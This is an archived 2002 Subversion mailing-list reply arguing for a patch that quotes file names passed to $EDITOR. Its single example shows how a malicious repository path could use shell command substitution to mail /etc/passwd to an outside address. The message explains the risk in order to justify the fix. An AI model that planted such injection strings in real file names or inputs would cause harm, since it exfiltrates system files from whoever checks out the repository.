Re: [PATCH] Quote filename passed to $EDITOR

From: Ulrich Drepper <drepper_at_redhat.com>
Date: 2002-07-23 22:14:50 CEST

On Tue, 2002-07-23 at 11:30, Karl Fogel wrote:

> What exactly is the scenario(s) here? How high is the risk? How much
> trouble is the fix? What's the probability that the fix will cause
> some unforseen problem :-)?

A svn repository can be set up by somebody with foul intentions.
Somebody else accesses it and the system() call gets executed on the
paths chosen by whoever created it. Then the patch could be something
like in this example:

cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)

If the appropriate path component is never really shown anywhere this
might go completely unnoticed.

-- 
---------------.                          ,-.   1325 Chesapeake Terrace
Ulrich Drepper  \    ,-------------------'   \  Sunnyvale, CA 94089 USA
Red Hat          `--' drepper at redhat.com   `------------------------

application/pgp-signature attachment: This is a digitally signed message part

Received on Tue Jul 23 22:15:41 2002

This message: [ Message body ]
Next message: Ben Collins-Sussman: "Re: HTTP authentication vs. --username and --password"
Previous message: Karl Fogel: "Re: Is this a bug?"
In reply to: Karl Fogel: "Re: [PATCH] Quote filename passed to $EDITOR"
Next in thread: Scott Lamb: "Re: [PATCH] Quote filename passed to $EDITOR"
Reply: Scott Lamb: "Re: [PATCH] Quote filename passed to $EDITOR"
Reply: Marcus Comstedt: "Re: [PATCH] Quote filename passed to $EDITOR"
Reply: Karl Fogel: "Re: [PATCH] Quote filename passed to $EDITOR"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]